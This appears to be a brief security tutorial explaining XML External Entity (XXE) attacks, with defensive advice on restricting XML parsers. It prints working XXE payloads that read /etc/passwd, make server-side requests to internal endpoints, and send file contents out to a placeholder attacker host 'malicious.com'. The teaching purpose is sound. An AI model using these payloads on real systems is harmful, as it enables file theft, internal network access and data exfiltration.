XML is a markup language like HTML and is widely used to store and transmit structured data. It consists of elements (tags), attributes, and character data. See example:
<?xml version="1.0" encoding="UTF-8"?> <message id="1"> <to>John</to> <from>Mary</from> <heading>Reminder</heading> <body>Don't forget to call me!</body> </message>
The first line is the declaration and is not part of the structured data. The remaining lines define the static structure of a message.
The problem begins when XML content is interpreted. What makes it dynamic also makes it dangerous.
XSLT (Extensible Stylesheet Language Transformations) is a language used to transform and format XML documents:
- An attacker can inject, modify, or extract sensitive data in XML documents.
- A crafted XML file can expand entities to reference external resources, leading to an XML External Entity (XXE) vulnerability.
DTDs (Document Type Definitions) define the structure and the allowed elements and attributes of an XML document.
- DTDs declare which entities and attributes are permitted, and are used to validate data integrity before processing.
- This feature can be abused using the
SYSTEMkeyword to reference external declarations such as file paths or URLs. - In other words, it can allow malicious data or code injection. See examples below.
(1) Arbitrary file read:
<!DOCTYPE foo [<!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <config> &xxe; </config>
(2) Server-Side Request Forgery (SSRF):
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "http://localhost:8080/internal-endpoint">]> <config> &xxe; </config>
(3) Blind XXE:
<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % blind "<!ENTITY exfil SYSTEM 'http://malicious.com/?exfil=%cmd;'>"> %blind;
<!DOCTYPE foo SYSTEM "http://malicious.com/attack.dtd"> <config> &exfil; </config>
XXE Vulnerability
- In-Band
- Allows data to be exfiltrated directly from the target.
- Out-of-Band (Blind)
- Requires additional resources to exfiltrate data, such as DNS queries or HTTP requests to an attacker-controlled host.
- Denial-of-Service (DoS)
- Attackers can cause a DoS by abusing entity expansion with excessively large or recursive entities.
Considerations
- XML Parsers should allow the minimum amount of content interpretation, since features like External Entities and DTDs can easily be misused.
- Prefer CSV or JSON (preferably JSON) over XML when possible.
- Vulnerabilities are typically the result of misconfiguration, poor coding practices, and insufficient restrictions.